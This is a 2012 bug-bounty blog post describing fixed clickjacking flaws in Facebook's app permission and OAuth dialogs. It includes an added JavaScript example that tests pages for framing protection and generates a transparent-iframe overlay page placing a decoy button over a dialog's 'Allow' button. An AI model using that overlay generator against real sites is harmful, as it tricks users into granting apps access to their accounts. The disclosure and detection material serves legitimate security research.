Tuesday, 21 August 2012

No XFO? It's time for Facebook Clickjacking

This post is a summary of the clickjacking bugs I reported to the Facebook bug bounty program. All the bugs discussed here are now fixed. An attacker was able to add any malicious Facebook app, with any permissions, to the victim's account with just one click. The vulnerable pages discussed below lacked anti-clickjacking protection such as the X-Frame-Options header, so an attacker could render them in an invisible iframe on a page he controls and trick the victim into clicking inside it.

The first bug I found was in the permissions.request dialog on the Facebook mobile site. This dialog is used to add a Facebook app to the authenticated user's account. A single click on the "Allow" button adds the app to the victim's Facebook profile.

The vulnerable link, which adds "Graph API Explorer" app, was:


Here the "display" parameter decides the appearance of the page based on the value supplied. It takes three values: page, wap and touch. The page display is mainly used on the Facebook main site, and wap and touch are used for the Facebook mobile site.

The next bug was a variation of the previous one: the permissions.request dialog page could be rendered in an iframe when requested with the "display=wap" parameter. With this parameter the Facebook main site serves the mobile-style page, and that variant was lacking clickjacking protection at the time. The vulnerable page for this was:


By this point I had learned some new things about these dialogs and found that I could attach any permissions to the app.

The last bug was in the OAuth dialog, again on the Facebook mobile site. The vulnerable page was:


Sadly this bug didn't win a bounty, as Facebook said: "This can't be protected with X-Frame-Options because it needs to be servable in an arbitrary iframe."

Along the way I developed my own process for finding such bugs, which helps me identify them quickly.
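An added example, not code from the original post, of the kind of check such a process involves: given a page's response headers it decides whether an attacker's origin may frame the page (browsers apply a CSP frame-ancestors directive first and fall back to X-Frame-Options; with neither, anyone can frame it), runs that check over the page, wap and touch variants of a dialog, and builds the invisible-iframe overlay page described above. The target URLs, header sets, attacker origin and "Allow" button coordinates are constructed placeholders, not Facebook's real responses or layout.

```javascript
// Added example, not code from the original post. Decide whether a dialog page
// can be framed by an attacker's origin, and build the invisible-iframe overlay
// a clickjacking page uses when it can. All URLs and headers are constructed.

// Return the source list of a CSP frame-ancestors directive, or null if the
// Content-Security-Policy header has no such directive.
function frameAncestors(csp) {
  for (const directive of csp.split(';')) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0].toLowerCase() === 'frame-ancestors') return tokens.slice(1);
  }
  return null;
}

// Does one frame-ancestors source expression admit `origin` as an embedder?
// `self` is the origin of the framed page itself.
function sourceAllows(src, origin, self) {
  const s = src.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return origin === self;
  if (s === '*') return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return origin.startsWith(s); // scheme-source, e.g. https:
  if (s.includes('://*.')) {
    // host wildcard, e.g. https://*.example.com matches any subdomain
    const [scheme, host] = s.split('://*.');
    return origin.startsWith(scheme + '://') && origin.endsWith('.' + host);
  }
  return origin === s; // exact origin
}

// headers: response headers with lowercased names (as Node's http module gives).
// Returns { frameable, reason } for a page at targetOrigin embedded by attackerOrigin.
function framingPolicy(headers, targetOrigin, attackerOrigin) {
  const csp = headers['content-security-policy'];
  const ancestors = csp ? frameAncestors(csp) : null;
  if (ancestors) {
    // When frame-ancestors is present, browsers ignore X-Frame-Options.
    const allowed = ancestors.some((src) => sourceAllows(src, attackerOrigin, targetOrigin));
    return { frameable: allowed, reason: `CSP frame-ancestors ${ancestors.join(' ')}` };
  }
  const xfo = (headers['x-frame-options'] || '').trim().toLowerCase();
  if (xfo === 'deny') return { frameable: false, reason: 'X-Frame-Options: DENY' };
  if (xfo === 'sameorigin') {
    return { frameable: attackerOrigin === targetOrigin, reason: 'X-Frame-Options: SAMEORIGIN' };
  }
  if (xfo.startsWith('allow-from')) {
    // Chrome and Safari never supported ALLOW-FROM and treat the header as absent.
    return { frameable: true, reason: 'X-Frame-Options: ALLOW-FROM is ignored by Chrome and Safari' };
  }
  if (xfo) return { frameable: true, reason: `unrecognised X-Frame-Options "${xfo}" is ignored` };
  return { frameable: true, reason: 'no X-Frame-Options and no frame-ancestors' };
}

// Constructed sample: one dialog served with three values of its "display"
// parameter; only the "page" variant carries X-Frame-Options. Placeholder URLs.
const SAMPLE_RESPONSES = {
  'https://target.example/dialog?display=page': { 'x-frame-options': 'DENY' },
  'https://target.example/dialog?display=wap': {},
  'https://target.example/dialog?display=touch': { 'content-security-policy': "frame-ancestors 'self'" },
};

// Return the URLs that a page on attackerOrigin could put in an iframe.
function findFrameable(responses, attackerOrigin) {
  return Object.entries(responses)
    .filter(([url, headers]) => framingPolicy(headers, new URL(url).origin, attackerOrigin).frameable)
    .map(([url]) => url);
}

// Build the attacker's page: a visible decoy button at (100,100) and the target
// dialog in a fully transparent iframe, shifted so that the dialog's real "Allow"
// button (at allowBox inside the frame; constructed numbers) sits exactly under
// the decoy. The iframe is stacked on top, so the victim's click lands on "Allow".
function buildClickjackPoc(targetUrl, allowBox) {
  const attr = (s) => String(s).replace(/&/g, '&amp;').replace(/"/g, '&quot;');
  const { left, top, width, height } = allowBox;
  return [
    '<!doctype html><html><body style="margin:0">',
    `<button style="position:absolute;left:100px;top:100px;width:${width}px;height:${height}px">Click to continue</button>`,
    `<iframe src="${attr(targetUrl)}" style="position:absolute;opacity:0;border:0;` +
      `left:${100 - left}px;top:${100 - top}px;width:800px;height:600px;z-index:2"></iframe>`,
    '</body></html>',
  ].join('\n');
}

const frameable = findFrameable(SAMPLE_RESPONSES, 'https://attacker.example');
console.log('frameable without protection:', JSON.stringify(frameable));
console.log(buildClickjackPoc(frameable[0], { left: 40, top: 120, width: 90, height: 30 }));
```

Running it prints only the "display=wap" variant as frameable, followed by the overlay page for it. Feeding real response headers into `framingPolicy` (for example from a proxy log) is the quick way to spot a variant of a page that lost its header; the opacity and z-index in the overlay are what make the click invisible, and the only thing left to measure in a real PoC is where the "Allow" button renders inside the frame.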

All of these bugs result in a malicious app with unwanted permissions being added to the victim's account with a single click. These permissions include access to email, status messages and many other things.

Here is a small demonstration:

That's all. Hope you like this post. Suggestions and comments are welcome.

1 comment:

  1. nice catch.
    Despite it needing to be served in an arbitrary iframe, it still needs some protection. I think there should be a confirmation window (prompt) when clicking allow, which cannot be invisible.